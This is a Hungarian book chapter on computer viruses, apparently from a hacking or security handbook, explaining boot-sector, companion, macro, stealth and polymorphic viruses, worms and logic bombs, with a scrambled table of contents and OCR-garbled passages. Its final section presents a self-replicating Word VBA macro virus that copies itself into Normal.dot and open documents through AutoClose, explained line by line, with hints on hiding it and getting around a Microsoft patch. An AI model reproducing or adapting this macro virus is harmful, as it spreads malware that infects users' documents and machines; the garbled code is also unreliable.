6 Hálózati vírusok 5.1.4.5 Ilyet is lehet: a vírus egy Payload-ot hív meg .4.5.4.3 Killerprogramok 5.1 Minden ténykedés központja .3.2 5. fejezet .4.1 Bootszektor vírusok 5.5.Tartalom 5.dot fájl 5.11 Férgek .5 Word makrovírus írása 5.2 Companion vírusok 5.1 Defektes cluster mint álcázás 5.3 A vírus felépítése Hogyan fertőz meg a vírus egy fájlt? 5.3 Vírusok kontra ServiceRelease 5.az ILOVEYOU és társai 5.1 Így fertőznek a bootszektor vírusok 5.9 TSR fájlvírusok 5.4 Logikai bombák 5.4 Modul makrók 5.10 Update vírusok 5.4.4.4.3.1.5.2 Miről ismeri fel a vírusvizsgáló a vírust? 5.1.8 Stealth vagy rejtőzködő vírusok 5.5.2 A dropper vírust helyez el 5.4.2 Modul vagy osztálymodul? 5.4.5.12 Időzítők 5.7 Polimorf vírusok 5.4.5 Makrovírusok 5.3 Videokártyák .4 A legfontosabb vírustípusok rövid áttekintése 5.a Normal.az elvetemült támadók búvóhelyei? 5.4.5.1 Alapok 5.4.

4 A forrás .4 A vírusvédő program kiválasztásának a szempontjai .kommentárokkal 5.8.7.8.2 Víruspajzs 5.8 Hogyan működnek a vírusvizsgálók? 5.7.7.5.142 A működési mód 5.8.6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg 5.1 Szkennermodul 5.7.3 „Fertőtlenítő" 5.7 A vírus jelszóval védi a fájlt 5.3 Hogyan tudott a féreg elterjedni? 5.1 Mi az a féreg? 5.8.5.5.6 5.7 Megfertőzött osztálymodulok ILOVEYOU 1385.

az FBI egy eljárást fejleszt. Az amerikai szövetségi rendőrség. hogy kódolás közben kvázi kukucskál a felhasználó válla fölött. A Magic Lantern azelőtt kezd működni. Doktori disszertációjához fejlesztette ki az önmagát reprodukáló program elméletét. Csak miután az ipar bizonyítékokat szerzett arról.com online média. A US-hatóságok szemében már régóta tüskét jelentettek az erős kódolásra alkalmas programok. úgy. a vírus minden billentyűzet-bevitelt feljegyez. mielőtt még az adatok kódolása megtörténne. Ezután a vírus mailben fogja elküldeni magát. Az általa . hogy a kemény kódolóprogramok az exporttilalom ellenére is elterjedtek. Egy Magic Lantern nevű szoftver segítségével az FBI specialistái a jövőben egy olyan vírust tudnak becsempészni a gyanús szerverekre.1 Alapok Az FBI kódolás elleni vírust fejleszt Minden eszközzel a potenciális terroristák ellen . amellyel a kódolt adatokat már a keletkezésük helyén dekódolni lehet . amely megteremti a dekódolás előfeltételeit. Az FBI-nak sok szerverrel nem lesz nehéz dolga.Veszélyes fájlok 5. mivel az ezekkel kódolt adatokat nem lehet viszszafejteni. 1983-ban programozta az első hivatalosan ismertté vált vírust Fred Cohan a dél-kaliforniai egyetemről.. Ha a fertőzött számítógépeken elindítanak egy kódolóprogramot. az USA fel adta a hivatalos ellenállást. és elküldi az FBI-nak.5 Vírusok . és rögtön bizonyítékkal is szolgált..jelenti az MSNBC. vagy ismert biztonsági réseken becsempészi magát a szerverszoftverbe.

hogy a rendszer minden felhasználója megkapott minden elérési jogot. amelynél a kórokozók átterjednek egyik egyedről a másikra. Valójában ez lehetetlen: egy videokártya videomemóriája nem bootképes. vagy csak jelzik a hibát. Egy vírustámadás következtében azonban bizonyos körülmények között minden adat és program elveszhet. a szakszerűtlen kezeléstől vagy a hackertámadásoktól. A legtöbb esetben a szoftver vagy egy meghajtó hiányosságáról van szó. A vírus az egyik vírushordozóról egy másik potenciális vírushordozóra. amelyek védik őket a lelepleződéstől. 5. az kiderül a későbbiekben. mint a vírusoktól és következményeiktől. amelyet interneten.1. Ennek a segítségével tudja bármikor ellenőrizni. Ha talál ilyet. Mivel a komputervírusok a biológiai vírusokhoz hasonlóan viselkednek. A legtöbb felhasználói program (tehát a vírusvizsgálók is) egyszerűen átugorják a hibás clustereket. a vírus bemásolja a programkódját a fájlba. Fertőzésnek az orvostudomány azt a folyamatot nevezi.a lemez egy fertőzött bootrutinjával. Ez történhet egy olyan fertőzött program elindításával. A hatása az volt. Hogy az Offíce-alkalmazások makrovírusai milyen veszélyesek lehetnek. és az elfoglalt clustert (helyfoglalási egységet) hibásnak mutatja. fel lehet használni egy meghatározott vírus kereséséhez az adathordozón. és a megmaradt tárterületet mutatják meg. Ezért egyetlen vírus sem tud közvetlenül a videokártya memóriájából a számítógép végrehajtható memóriájába kerülni.1 Defektes cluster mint álcázás A vírusoknak többnyire álcázómechanizmusaik vannak. mintha egy képről. A keresés csak az önmagukat kódoló vírusoknál válik problematikussá. hogy a vírus mondjuk x napon rajzoljon egy képet a monitorra. 5. amely szükség esetén úgy alakítja át a fájlt. Az újságokban és a televízióban újra és újra horrorisztikus híreket hallani új és veszélyes vírusokról. végrehajtható fájlt keres. Az egyik ilyen mechanizmus például megakadályozza. A vírusok állítólag a kártya videomemóriájába fészkelik be magukat. A harmadik rész dönti el. Ebben a részben található a programkód is. a hex-pattern.3 Videokártyák az elvetemült támadók búvóhelyei? A videokártyák gyakran állnak vírushordozó gyanújában. 5. Itt először egy szubrutinról van-e szó. A program általában álcázva van. mert egy EXE fájllal sok felhasználó már eleve óvatosan bánik. Ezek azonban többnyire erőteljes túlzások. hogy felismerje. Ártalmatlan esetben itt található az utasítás. amelyek hasonló körülmények között eddig nem léptek fel.2 Miről ismeri fel a vírusvizsgáló a vírust? Minden vírusnak van egy jellemző bitmintája. A második rész tartalmazza a tulajdonképpeni fertőzőrutint. A vírus befészkelődik az adathordozó egy tetszőleges helyére. amelyről a vírus felismeri önmagát. vagy egy destruktív kártevőről. és a vírus arra használja. Persze nem vezethető vissza vírusra a számítógéppel történő munka során fellépő hibák mindegyike.a bootszektor vírusoknál . amely még nem fertőzött.4.2 A vírus felépítése Minden vírus három vagy gyakrabban négy programrészből áll: az első rész egyfajta ismertetőjegy. ami jelentős anyagi károkat okoz. fertőzött-e már egy fájl. CD-n vagy lemezen keresztül lehet kapni. vagy írjon ki egy meghatározott szöveget. 5.1. Az esetleges álcázási eljárás szubrutinja is itt található. akkor vírusellenőrzést kell végezni. A videokártya memóriáját a vírus legfeljebb egy azonosító tárolására használhatja. amely közepes vagy nagy katasztrófát vált ki. vagy . itt is az átviteli folyamatot nevezik fertőzésnek. . hogy meg van-e már fertőzve egy fájl. az adatokat csak tárolja.programozott vírus Unix operációs rendszer alatt futott. A valóságban jelentősen több kár éri a számítógépes rendszereket és az adataikat szabotázsoktól. De ez a hely tartalmazhatná azt a parancsot is. Ez hexadecimális karaktereknek egy 10-16 bájt hosszú láncából áll. ami csak egy kis tréfát csinál. hogy: „a következő újraindításnál formattáld a merevlemezt". Ha ez a hex-pattern már ismert. Ennek ellenére óvatosnak kell lenni: ha hirtelen olyan hibák jelennek meg. hogy ártalmatlan vírusról van-e szó. egy Word vagy egy Excel fájlról lenne szó. hogy a felhasználó felfedezze a vírus elfoglalta tárterületet a merevlemezen. Gyakran éppen az ártalmatlannak vélt fájlok okozzák a legnagyobb károkat. például egy merevlemezre kerül. hogy a vírus a program indításakor azonnal aktiválódni tudjon.

4. ezért is lehet egyre nehezebben osztályozni a vírusokat. amellyel a program a víruskód végrehajtása után visszatér oda.1 Bootszektor vírusok A leggyakrabban fellépő vírusok az olyan bootszektor vírusok. és annyival meghosszabbítja. amely utasítja a BlOS-t az operációs rendszer betöltésére. Több módszer kombinációja is gyakran előfordul. ahol a vírus megszakította a program futását. a fájl. illetve a master boot partíciós szektort vagy a DBR-t. Ha ezt végrehajtotta.2 A dropper vírust helyez el A dropper nem vírus. a betöltőprogram csak egy jelzést küld a képernyőre: nem rendszerlemez. a vírusokat el lehet távolítani. A vírust az ilyen lemez is hordozhatja. amelyeknek a fájlmelléklete vírust rejt. Sok vírus egy futtatható fájl végéhez fűzi a saját programkódját. Más vírusok átírják a FAT-ben található könyvtárinformációt. mint a vendéglátója. Egyes vírusok azonban sokkal gátlástalanabbul viselkednek. akkor ez először elindítja a vírust. 5. akkor ez viszonylag észrevétlenül történhet. az elejére pedig egy hivatkozást tesz erre a kódra. Ha a gazdaprogram.3. ahogyan a vírus beveszi magát egy programba. 5. nem is vírussal fertőzött program. Az ilyen figyelmeztetésekben általában azt is megadják. és egyszerűen átírnak a fájlból annyit. Ha a gép indításkor a bootszektorhoz ér.3 Hogyan fertőz meg a vírus egy fajit? A fájlok megfertőzésénél a legnagyobb különbségek a módban vannak. Egy bootszektor vírus a következőképpen terjed. és ettől a perctől kezdve még meg nem fertőzött fájlokat keres. a merevlemezre vagy egy fájlba. mint a vírus. majd az továbbítja az elérést a helyes címre. amelyek nem tartalmaznak programokat. és megfertőzze őket. a helyére pedig a saját betöltőprogramját írja. az a saját feladatainak a futtatása előtt először a vírusprogramra ugrik. illetve DOS-bootszektort fertőzik meg a merevlemezen. amelyek a bootszektort és a fájlokat is meg tudják támadni. 5. először a vírus indul el. Az alábbiakban egy rövid áttekintést adunk a legfontosabb vírustípusokról és sajátságaikról. Itt található az a parancs. Most már minden alkalommal. ugyanolyan méretű vagy nagyobb. egy vírust telepít a memóriába.A negyedik résszel zárul a kör. Ez egy rutin. Emellett vannak még hibrid vírusok is. Az eredeti címeket a vírus egy rendezett listára helyezi. Az ilyen vírusok a hajlékonylemezek bootszektorát és/vagy a master boot recordot (MBR). a vírusbetöltő először a vírust indítja el. a vírus pedig elrejtőzik valahol az adathordozón. csak fájlokat. ahol eredetileg megszakította a folyamatot.3. hogy azokhoz is hozzáférkőzzön. Ha a programot elindítják. megint visszaugrik arra a helyre. Ha egy programot elindítanak. . akkor kompletten átírja a fájlt. Ez fontos. Ha a bootolási kísérletnél nem talál operációs rendszert.1 így fertőznek a bootszektor vírusok A vírusok egy másik típusa áthelyezi az eredeti bootszektort. Egyes antivírus-programok megkísérlik a dropperek felismerését.4 A legfontosabb vírustípusok rövid áttekintése A vírusfigyelmeztetések szinte már a napi rutinhoz tartoznak az interneten. Ha a vírus nagyobb. a DOS boot recordot. amennyi helyre szüksége van. mikor a programot elindítják. 5. A droppereket egy bizonyos vírus átvitelére alkalmas programként vagy egyszerűen egy szabotázs segédeszközeként írják meg. A vírus ezen a módon olyan lemezeken is terjedhet. Többnyire a mailektől óvnak. Felhasználóként legfeljebb a fertőzött program indulási sebességének a minimális változását vesszük észre. mert a „fertőzésveszély" a típustól függően nagyobb vagy kisebb. és ezután áttereli a beolvasást az átültetetett eredeti bootszektorra. amennyire a programkódjukhoz szükség van. hogy milyen vírusról van szó. mint a Form és a Stoned vírus. 5. A víruskódnak ez a fájlhoz fűzése nem okoz maradandó károsodást a fertőzött fájlon. s az újabbaknak ez általában sikerül is. mivel a nem bootképes lemezeknek is van egy minimális bootszektoruk. ám ha lefut. és minden programnál a vírusprogram címét adják meg. Minden fertőzésmódnak létezik néhány variánsa.

Egyes operációs rendszereknél. és ebben keresendő a bootszektor vírusok gyakoriságának az oka is. 5.2 Companion vírusok Ha egy COM és egy EXE fájlnak ugyanaz a neve. második lehetőségként pedig meg lehet adni a CD-ROM meghajtót. hogy először mindig a merevlemezről próbáljon bootolni. ennek ellenére gondosan ellenőrizzük vírusvizsgálóval. Ez a flopi azonban Stoned vírussal fertőzött. Betölti a lemez első szektorát a memóriába. A vírusvizsgálók. Ha egy merevlemez-problémánál a bootolás lehetetlenné válna (headcrash vagy hasonló). A lemezt behelyezzük az A: meghajtóba.Kapunk egy flopit adatokkal. Telepíti magát a merevlemezre. Ezt az üzenetet már ezerszer láttuk. ami mostanra azonban már nem más. A fertőzés csak a fertőzött lemezről történő indítási kísérletnél következhet be. hogy lefuttassa a kódot. az EXE fájlhoz készítenek egy azonos nevű COM fájlt. így a gépünk most minden lemezt megfertőz. A fertőzött flopik bootszektoráról kerülnek fel a gépre. Az. tehát a vírus fut le. Sokan meg vannak lepve. amelyek bizonyos számú fertőzés után tönkreteszik a fertőzött gép merevlemezét. Mivel azonban fogja a flopiról olvasás/flopíra írás interruptját. a valóságban a vírus ír a lemezre) megvizsgálja a lemezt. A companion vírusok is ezt a körülményt használják ki. működési módjuk miatt. mert abban a pillanatban. amelyben benne van a víruskód. Kárt azonban ugyanúgy okozhat ezeken a gépeken is. Ha ezután elindul a gép a merevlemezről. és ha még nincs megfertőzve. lefut az MBR.3 Killerprogramok A killerprogramok olyan vírusok. A lemezeket. például készített egy újabb companion vírust egy újabb fájlhoz. 5. Volt néhány igazán sikeres companion vírus. hogy milyen operációs rendszert használ a gép. és innentől kezdve az indítási folyamat a megszokott módon folytatódik. hogy egy vírus terjed. olvasásról van szó. és csak így lehet őket továbbadni (egy bootszektor-vírus nem tud például a hálózaton keresztül terjedni). amelyek nem DOS-alapúak. a BIOS-t még mindig át lehet állítani egy tiszta(!) lemezről bootolásra. csak a lemezek vizsgálatakor tudják felismerni és törölni a bootszektor vírusokat.4. hogy úgy tűnjön. az operációs rendszer vagy a védőprogram még egyáltalán nincsen betöltve. vagy hogy milyen vírusvédő programot telepítettek rá. kicseréli magára az MBR-t. a folytatáshoz üssünk le egy tetszőleges billentyűt amennyiben nem talál rajta DOS-rendszerfájlokat. A vírus memóriarezidenssé válik. előbb vagy utóbb pedig tovább adjuk ezeknek a lemezeknek valamelyikét. A bootszektor vírusok PC-ket támadnak meg. és a BIOS-ban Boot from Floppy van beállítva: tehát a számítógép megpróbál erről a lemezről elindulni. a vírusprogram minden A: meghajtóra/-ról irányuló írási vagy olvasási műveletnél (habár azt gondoljuk. mint azt egy döbbent Unix-felhasználó megtapasztalta. elindítja az EXE programot is. amit tartalmaz. és ezután betölti az eredeti MBR-t. A boot-támadás idején azonban tehetetlenek. és így nem tud terjedni. és ezt a nevet begépeljük. helyette a COM program. akitől a lemezt kaptuk. és az eredeti MBR-t a merevlemez egy más pontján helyezi el. rátelepszik a 13h interruptra. de az alapelv mindegyiknél ugyanaz. amelyeket kapunk. az adathordozóról történő olvasás és írás interruptjára. Eddig a vírus még semmit sem csinált. ami bekerül az A: meghajtójába. és lenyomunk valamilyen billentyűt. Valamikor kikapcsoljuk a számítógépet. a PC ugyan megfertőződík. A különböző bootszektor vírusok működési módjai a részleteikben ugyan különböznek egymástól. A lemez még az A: meghajtóban van. a vírus azonban nem tudja a gépbe helyezett lemezekre másolni magát. és elkezdjük használni az adatait. mikor megtudják. Ajánlott a számítógép fő bootszekvenciáját úgy beállítani a BIOS-ban. mikor a bootszektor vírus telepíti magát. Ha a vírus befejezte a ténykedését. de nem sok. hogy egy vírus ilyen módon terjed. Az elrejtéshez gyakran a rejtett vagy a rendszer tulajdonságot adják a fájlnak. vagy hogy kiírja: Nem rendszerlemez. hogy az EXE fájl egyáltalán nem változik. amely egy rögzített értéktől kezdve visszaszámol. Ezeket az intéző alapértelmezésben nem mutatja. mint a Stoned vírus. minden a legnagyobb rendben működik. azonban nem tudja. nehogy másoknak okozzanak károkat továbbadáskor. március 6-án a Michelangelo vírus meglepetésszerűen lecsapott a gépére. amelyek a vírussal fertőzöttek. hogy a számítógépe és ezáltal a lemez is bootszektor vírussal fertőzött.4. és ezzel a körforgás elölről kezdődik. tehát kioldjuk a meghajtózárat. és így a megváltoztatott programok némelyike egyáltalán nem is veszi észre. mikor 2000. Semmi jelentősége nincs annak. és a vírus programja lefut. A következő reggelen újból bekapcsoljuk a számítógépet. A vírus erre a célra egy fertőzésszámlálót tartalmaz. Ha ezután megpróbáljuk elindítani az EXE fájlt. installálja a Stoned vírust a bootszektorába. még ha ez a kísérlet sikertelen is lenne. A vírusprogramozónak az a fő előnye. Ha eléri . a DOS először mindig a COM fajit hajtja végre.

és milyen trükköket vetnek be álcázásként. Még kompu- . az is megfertőződik a vírussal. 5. Mivel ezek minden rendszerben mások. még akkor sem. 2. Ezek a vírusok többnyire egy meghatározott rendszerre korlátozódnak: a bombák rendszerint csak egy megadott környezeten belül tudják reprodukálni magukat. helyi merevlemezén és a szerveren. hogy a szerveren is meg tudjon fertőzni fájlokat. kiváltja a rombolóakciót. azonban a legtöbb vírus hálózaton is tud terjedni. ez azt jelenti. A hálózat egy DOS-eszközt emulál. Hogy a makrovírusok hogyan működnek. A makrovírusok például egy másikra tudják cserélni a Mentés parancsot. „D" és „E" kollégák bejelentkeznek. csak az adatállomány többé nem olvasható és használható.4. Olyan vírusok. belátható időn belül aligha lesznek olyan vírusok. amint bekerül egy hálózatba. . A különböző címjegyzék-bejegyzéseken keresztül a vírus gyorsan eljut az üzletfelekhez. amelyek például Mac és MS-DOS gépeken is tudnának működni. minden kezdődik elölről.. Egyes esetekben a vírus ilyenkor kiadja és lefuttatja a FORMÁT C: parancsot. 7. 3. Más vírusok minden fájlt törölnek az adathordozón. még nincsenek. 5. és végrehajt egy fertőzött fájlt. A vírusnak tehát nem kell a szokásostól eltérően viselkednie ahhoz. A fájlvírusok ezzel szemben a következőképpen fertőznek hálózaton keresztül: 1. amelyek több operációs rendszerben is tudnának terjedni. és önálló programként tudják lefuttatni magukat.dot fájlt. Az ILOVEYOU a maga idejében pontosan ilyen vírus volt. Ez azonban a valóságban sokkal bonyolultabb. azonnal viharos sebességgel el is terjed rajta. A vírus memóriarezidenssé válik.6 Hálózati vírusok Speciális hálózati vírusokból még kevés van. „B" kolléga több más programot futtat saját. és minden rendszer más programozási követelményeket állít. ha több. A legtöbben azt hiszik. Amint megnyitunk egy fertőzött Word dokumentumot. amelyek ezáltal ugyancsak megfertőződnek. Másképp történik a fertőzés az olyan vírusoknál. mint lokálisan.dot végződéssel) és már Excel fájlokban is találunk. „B" kolléga bejelentkezik a szerverre. az a későbbiekben fog kiderülni. és ezért ezen a környezeten kívül hatástalanok. „C". „A" kolléga megfertőzi a számítógépét. 4. Itt elég.a nullát. ha „A" kolléga lefuttatja a fájlt. barátokhoz stb.4. Valamennyi végrehajtott fájl megfertőződik. a koncepciójuknál fogva.4. például egy bizonyos szó vagy felhasználói név beírása vagy hiánya. és futtatják a ferőzött fájlokat. Ezek a vírusok nem programfüggelékként terjednek a rendszerekben. hogy fájlok olvasása és írása ugyanolyan módon történik a szerveren. hogy egy vírus. mindig egy rendszer gyenge pontjaira vannak kihegyezve. 5. a felhasznált programnyelv alapján adatokat tudnak törölni vagy módosítani. Ilyenkor minden fájl ott marad ugyan a merevlemezen.doc vagy .és így tovább. 6. Először is a bootszektor vírusok nem tudnak hálózaton keresztül terjedni. A vírusok. Ha ezután egy dokumentumot mentünk vagy nyitunk. Makrovírusokat jellemzően Microsoft Word dokumentumokban (. 5. és a címjegyzékéből minden kollégája kap egy mailt a vírussal. hálózatra csatlakozó számítógép fertőzött. valószínűleg egy e-mail mellékletével vagy egy barátja demólemezével. az megfertőzi a Normal. A vírus „B" kolléga gépén is memóriarezidens lesz. „A" kolléga néhány programot a hálózaton futtat. ezek is megfertőződnek. Más sajátosságai mellett saját magát szaporította. A klasszikus hálóvírusok az úgynevezett férgek. és így lavinát vált ki.4 Logikai bombák A logikai bombák a vírusok különleges fajtái: ezeknek a működésbe lépését kiválthatja egyfajta időzítő vagy egy feltétel teljesülése. mert ez a vírustípus csak flopin keresztül terjed. amelyek adatfájlokat fertőznek meg. A legbarátságtalanabb változat a FAT bejegyzéseit változtatja meg.. milyen parancsokat tudnak kiváltani.. hanem önállóan tudják reprodukálni a saját kódjukat. „A" kolléga további programokat futtat a merevlemezén.5 Makrovírusok A makrovírusok olyan vírusok. amelyek elküldik magukat a mail-címjegyzék minden címére. Ha ezek a kollégák ugyancsak megnyitják a mellékletet.

hogy a fájlok tartalmazzák-e már a vírus egy régebbi verzióját. ha csak megnyitjuk azt (például egy adatmentésnél bizonyos körülmények között minden fájlt megnyitnak.az ILOVEYOU és társai A komputerférgek olyan programok. Többnyire több. 5. Egyszerűen beolvasom az eredeti bootszektort onnan.8 Stealth vagy rejtőzködő vírusok Ha egy vírus memóriarezidenssé tud válni. mert egy bootszektor vírushoz sokkal egyszerűbb álcázórutint írni. ha egy tetszőleges program megpróbálja olvasni a bootszektort. ami pedig a komputeres világban megjelenő vírusok 99%-ára igaz. akkor ezzel nem fertőz újra. 5. hanem egy update rutint is. Hi-hi. A stealth vírusoknál viszont. mint fájlvírusoknál. azonban van néhány eszközmeghajtó vírus is. Ha bootszektor vírusról van szó. amelyből egy helyen nem fordul elő két másolat.7 Polimorf vírusok Az antivírus programok leggyakrabban használt fajtája a szkenner. amelyek ugyanazt a bájtsorozatot tartalmaznák. Egyes vírusokat gyorsan fertőző vírusoknak is neveznek. amely ellenőrzi. amikor végrehajtják. Egyes vírusok overlay fájlokat (programok lapozófájljai) fertőznek meg. Az 1986-ban készült Éráin vírus volt az első olyan.4.OVL fájlok. ha az még nem fertőzött. valakinek le kell futtatni a fertőzött programot.4. hasonló trükkel szintén el tudják titkolni a létezésüket úgy. 5. Használnak még más fertőzőrutinokat is." Ezáltal a lekérdező programnak semmi szokatlan sem tűnik fel. Ezeknél nem klasszikus vírusról van szó. Családokra oszlanak. hanem azzal rokon zavaróprogramokról. és hálózati funkciók segítségével más számítógépekre másolódnak. ennél sokkal összetettebb és nehezebb feladatot kell megoldania annak. hogy gazdaprogramokhoz fűzzék magukat. csak azokat a bájtokat látja.4. aki el akarja csípni. Ha igen. az ilyen típusú vírus fájlokat támad meg. 5. Mint a neve is mutatja.11 Férgek . amelyeknek nincs szükségük arra. amely a víruskódok egy bizonyos repertoárja után kutat. akkor legalább egy interruptot fogni tud. amelyek önállóan tudnak egy hálózaton terjedni. akkor lecseréli ezeket. fájlokat. mert a mailforgalom egyfolytában növekedett. amely meghatározza.tercégeknél is egész részlegeket bénított meg.4.4. amely a fájlt olvassa. hogy megfertőzze. amit a meghajtó tartalmaz. a vírus azt mondja magában: „Aha. mint amilyen a Frodo. akkor az a 13h interruptot használja (az adathordozók olvasása/írása). hogy egy TSR vírus terjedni tudjon. A komputerférgek saját magukat tudják reprodukálni.10 Update vírusok Az update vírusok különösen ravasz kórokozók. Az ilyen vírusok már akkor megfertőznek egy fájlt. bár ez az esetek 99%-ára igaz. A férgek önálló programok. hogy minden program. A polimorf vírus olyan kártevő. és általában minden utána elindított programot megvizsgál. A vírus memóriarezidenssé válik. 5. egymáshoz kapcsolódó programszegmensből állnak. ezek az *. hogy a vírus fellépett-e már valamely verziójában.9 TSR fájlvírusok A második leggyakoribb vírusfajta a TSR fájlvírus. amelyik ezzel a trükkel dolgozott. itt valaki látni akarja a bootszektort. A fájlvírusok. és minden további futtatás ismét elindította a küldést. és a végrehajtható programoknak sem feltétlenül kell COM vagy EXE kitérjesztésűeknek lenniük. és ezeket többnyire egyetlen programozó vagy egy csoport fejleszti. A hex pattern mellett ezek a vírusok nemcsak egy verziószámot tartalmaznak. Ha újabb verzió van telepítve. de a legtöbb esetben egy program csak akkor fertőződik meg. Ezért egy ilyen vírust nem lehet egyszerűen egy meghatározott bájtsorozatról felismerni. A Green Caterpiller fertőzőrutinját viszont minden olyan folyamat kiváltja. ahová eltettem. hogy milyen fájlok állnak rendelkezésre az adathordozón (pl. Ahhoz. Az ilyen álcázási képességek azonban gyakrabban figyelhetők meg bootszektor vírusoknál. De ez még nem minden: a rutin azt is megvizsgálja. azok közül is általában a COM és az EXE . a DIR parancs). A vírusprogramozó ezt a programot szeretné a legjobban becsapni. és aztán a fertőzött bootszektor helyett az eredeti tartalmát prezentálom.) Az első gyorsan fertőző vírus a Dark Avenger volt. amelyeket az a vírusfertőzés előtt tartalmazott. amelyek azonban vírust is tartalmazhatnak.

annak nagyon egyszerű a makrók írása. Itt különösen fontos tudni. amire egy Word makrovírushoz szükség van.3 Vírusok kontra ServiceRelease Az SR-1 a Microsoft egy ServiceRelease-e. hogy mindenki látta már a Word megerősítő kérdését. valamennyire módosított formában.2 Modul vagy osztálymodul? A vírusok mindig egy osztálymodulban vagy egy modulban vannak. még nem fertőzött DOCfájlba. Sub AutoCloseQ For I = 1 To NormalTemplate. vagy kétkedőn a tiltásukat választotta. amely a WordBasicben elérhetetlenné teszi a MacroCopy és Application OrganizerCopy parancsokat. és minden API-funkciót is ismer (API = Application Programming Interface). A következő oldalakon sok minden kiderül a Word makrovírusok programozásáról. Ha az elér egy rögzített értéket. a modulok és az osztálymodulok a fontosak. ha valakitől egy olyan dokumentumot kapott. Attribute VB_Name = "demo" On Error Resume Next Application. amelynek a sablonjában makrók voltak. Ezt a fájlt támadják meg. hogy milyen veszély bújik meg mögöttük. de egy vírusíró erre mindig talál megoldást. VBE. kiváltja a vírus akciótartalmának a végrehajtását. de biztosan nem volt a tudatában annak. Lehet. VBComponents(" demo"). Az időzítők feltételeinek a választéka szinte határtalan. De a Word idegen szövegeknél megkérdezi. Először a modulokban lévő makrovírusokkal foglalkozunk. a Normal.Count . A VBA lassú.4. Aki tud VB-ben programozni. hogy a makrók engedélyezésére kattintott.a Normal. A naptári dátumok mellett olyan rutint is lehet használni. amely minden nap. 5. és milyen potenciális veszélyeket hordoznak ezek. ugyanabban az órában indul el. hogy a Wordot megfertőzzék. Ha ezzel valaki meg tud úszni egy Word makrovírust vagy legalább felismeri azt. 5.12 Időzítők Az időzítők a vírusok speciális kioldómechanizmusai. Elméletileg így például születésnapi üdvözletet lehet valakinek küldeni. 5. Ha a Word fájlok makrót tartalmaznak.5. Íme.5 Word makrovírus írása Biztos. esetleg UserFormról lesz-e szó. amelyeket bárhol újra elő lehet venni. A UserFormok a makroprogramozás szempontjából nem érdekesek. ezért kell a fertőzéshez a Normal. de hatalmas.VBProject.dot-ba másolni a makrovínisokat. Ezekbe kerülnek az önálló projektrészek.Export "c:\demo. Egy modul elkészítéséhez az Eszközök/Makró/Visual Basic-kel megnyitjuk a Word makroszerkesztőjét. A feltétel lehet a bekapcsolástól számított időtartam vagy egy előre meghatározott dátum. Ez a kérdés azonban csak erre a dokumentumra érvényes. hogy az egészet csak tájékoztatásnak szánjuk. hogy Modulról vagy Osztálymodulról. és a Normal. már megérte az ismertetés.5. Ebben a fájlban lehetnek a makrók. hogy aktiválja-e a makrókat is.sys" 5. Itt a Beszúrás menüből kiválasztjuk. Minden parancsnak a birtokában van. de hangsúlyozzuk.5.dot-ot. nem pedig megvalósítás céljára.VBComponents.dot-ból minden. A vírusprogramon belül egy rutin lekérdezi a rendszeridőt.dot fájl A Word minden indításkor betölt egy globális fájlt. hogy milyen trükkökkel álcázhatják a programozók a programjaikat.1 Minden ténykedés központja . amelyek azután minden dokumentumra érvényesek. Ez a makrovírus alapÖtlete. 5. a vírusspecialista Aciidfreak útmutatója. amit a VB alatt is használni tudunk.ActiveVBProject.5.5. akkor ezek a fájl megnyitásakor rendszerint ugyancsak megnyílnak és aktívvá válnak. amely a szóban forgó napon automatikusan elindul.4 Modul makrók Az alábbiakban megtalálható minden.

dot-ban. Dobj.stealth A Word alapértelmezésben megmutat egy modult a VB Editorban. egyszerűen a következő parancsot hajtatja végre.Count If ActiveDocument. IfActiveDoaiment. hogy hibaüzenetet írna ki. VBComponents.VBComponents.dot-ban és nem az aktív dokumentumban vagyunk.Export "c: \demo. If ActivInstall = True And Normlnstall = False Then Set Dobj = NormalTemplate.Import ("c: \demo. VBProject Ha az aktív dokumentumban. If NormalTemplate. VBProject Itt a feltétel fordítva is átfut: Ha a Normal. On Error Resume Next Ez esetleg a VB-ből már ismert. amelyeket be lehet építeni. hogy később lehetőleg egy fertőzendő fájlba lehessen importálni. Sub AutocloseQ Ez a sub minden alkalommal lefut. mint a vírusé). Attribute VB_Name = "demo" A Demo a modul neve. Autoexec. For I = 1 To NormalTemplate. amelynek a neve „demo" (tehát.If NormalTemplate. Next I A For cikluson belül a következő értékre lépteti a ciklusváltozót. Vannak még más autofunkciók is. ami elárulná a vírust.ActiveVBProject. True-ra állítja a NormalInstall-t. True-ra állítja az Activlnstall-t. Most néhány funkció következik.VBComponents(I). VBProject. vagy az aktív dokumentumba.dot-ban van egy modul. AutoExit. hogy mire lett állítva a Dobj. akkor a Dobj NormalTemplate. hogy később melyik fájlba importál: vagy a Normal.dot-ban vagyunk.sys") Itt importálja az elején exportált fájlt (a vírust). VBProject. VBProject-re állítja. VBProject Dobj. ezt most fogjuk most darabokra szedni. Application. ha egy dokumentumot bezárnak.Name = "demo " Then Normlnstall = True Ha a Normal.VBProject. amit demo-nak hívnak (tehát a vírus). ahány modul található az aktív dokumentumban.Import ("c:\demo. Az álcázáshoz . VBComponents. Annyiszor ismétli meg a For és a Next közötti kódot.sys") End Sub így ni. VBProject-re lesz állítva. Az álcázás .Name = "demo" Then ActivInstall = True Ha az aktív dokumentumban van egy modul. ahelyett.VBProject.Count Ez egy For ciklus. For I = 1 To ActiveDocument.VBCpmponents(I). VBCpmponents(I). akkor a Dobj-t NormalTemplate. Annyiszor ismétli az utána következő kódot. hogy később kiváltsa az aktív dokumentumba importálást.dot-ba. Itt rögzíti.sys fájlba exportálja. Else If ActivInstall = False And Normlnstall = True Then Set Dobj = ActiveDocument. Hogy melyik fájlba lesz csomagolva. VBComponents. Ebben a fájlban benne van az egész forráskód.sys" A modult a C\demo. VBE. VBComponents(I). Ha hiba lépne fel. és nem a Normal. VBProject. Count Ez egy For ciklus. VBProject_ Else If ActivInstall = False And Normlnstall = True Then Set Dobj = ActiveDocument.VBProject.VBProject. az attól függ. ezenkívül a Normal. És a modul neve általában a vírus neve. amelyek automatikusan végrehajtódnak: például AutoOpen.Name NormInstall = True Next I = "demo" Then For I = l To ActiveDoctiment. ahány modul van a Normal. VBComponents ("demo").VBComponents.dot-on keresztül célzottan másolni is lehet a makrókat. Next I A For cikluson belül a következő értékre lépteti a ciklusváltozót.Name = "demo" Then ActivInstall = True Next I If ActivInstall = True And Normlnstall = False Then Set Dobj = NormalTemplate.

